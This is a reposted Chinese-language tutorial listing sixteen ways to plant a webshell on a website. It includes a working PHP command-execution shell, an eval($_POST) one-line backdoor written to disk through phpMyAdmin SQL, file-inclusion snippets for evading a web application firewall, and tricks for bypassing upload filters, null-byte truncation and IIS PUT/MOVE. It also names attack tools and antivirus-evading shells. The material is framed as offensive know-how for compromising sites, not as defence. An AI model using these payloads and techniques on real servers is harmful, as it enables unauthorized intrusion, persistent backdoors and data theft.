Webshell篇


常用方法簡介:

一、0day拿webshell

參考工具:織夢漏洞利用小工具

二、通過注入漏洞拿Webshell

前提條件:具有足夠權限,對寫入木馬的文件夾要有寫入權限,知道網站絕對路徑。

對於mssql注入漏洞,網站可以通過log備份、差異備份拿Webshell

對於mysql注入漏洞的網站可以通過into   file函數將一句話木馬寫入,拿Webshell。

參考工具:Getwebshell增強版、pangolin、

三、通過遠程命令執行拿Webshell

zhu.php

<?php
$x=$_GET["z"];
echo  "<pre>";
echo shell_exec($x);
echo  "<pre>";
?>

然后再瀏覽器訪問此php文件,跟一個z的參數是一句話木馬,輸出到cracer.php文件

跟着在瀏覽器訪問一下這個php文件,再用菜刀連接就可以了

四、struts2拿Webshell

參考工具:鬼哥struts2、Struts2漏洞批量檢測

五、通過用戶上傳頭像拿Webshell

原理:用戶注冊后,有些網站可以上傳頭像圖片、附件、文件等,可以利用此來上傳Webshell

六、IIS寫權限拿webshell

原理:通過找到有IIS寫入權限的網站,put進去一個txt文件,目錄必須有可寫的權限,然后通過move方法進行重命名為xxx.php

參考工具:IIS  put scanner

七、本地JS驗證突破拿Webshell

當網站設置了JS來限制用戶上傳的文件類型時,我們可以通過刪除JS文件或者修改上傳文件類型突破上傳限制拿Webshell

參考工具:使用burpsuit或fiddler代理工具提交,本地文件先改為XXX.jpg,上傳時攔截,再把文件名后綴更改為php即可

八、修改網站上傳類型配置拿Webshell

有的網站設置了上傳類型的限制,修改其上傳類型即可

 九、文件包含拿Webshell

先將Webshell改為txt文件上傳,然后上傳一個腳本文件包含該txt文件,可繞過waf拿webshell

asp包含

1.<!--#include  file="123.jpg"-->
2.調用的文件和被調用的文件必須在同一個目錄,否則找不到
3.不同目錄之間包含
<!--#include  virtual="文件所在目錄/123.jpg"-->

php包含

<?php include ("123.jpg")?>;

十、網站配置插馬拿Webshell

通過找到網站默認配置,將一句話插入網站配置中間。

十一、利用編輯器漏洞拿Webshell

常見的編輯器漏洞有fckeditor、ewebeditor、cheditor等

十二、通過編輯器模板拿Webshell

通過對網站的模板進行編輯寫入一句話,然后生成腳本文件拿webshell

通過將木馬添加到壓縮文件,把名字改為網站模板類型,上傳到網站服務器拿webshell

十三、數據庫命令執行拿webshell

可以利用phpmyadmin登錄數據庫使用數據庫命令將木馬導出,拿Webshell(適用於phpmyadmin比較老的版本)

create  table  study  (cmd  text  NOT  NULL);
insert   into  study(cmd)  VALUES  ('<?php eval ($_POST[cmd])?>');
select  cmd  from  study  into  outfile  'D:/www/rooney.php';
drop  TABLE  IF  EXISTS  study;

十四、00截斷拿Webshell

在上傳文件的時候,你上傳的文件名可能會被網站自動改成別的名字,這個時候你可以嘗試抓取文件上傳數據包,將文件名改為XX.asp%00.jpg進行截斷上傳,拿webshell

十五、利用解析漏洞拿Webshell

IIS  5.X/6.0解析漏洞
IIS  7.0/IIS  7.5 /nginx  < 8.03  畸形解析漏洞
nginx  < 8.03 空字節代碼執行漏洞
Apache 解析漏洞

十六:另類拿Webshell

更新頁面拿 Webshell
上傳插件拿Webshell
上傳特殊馬拿Webshell
上傳免殺馬過安全軟件

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM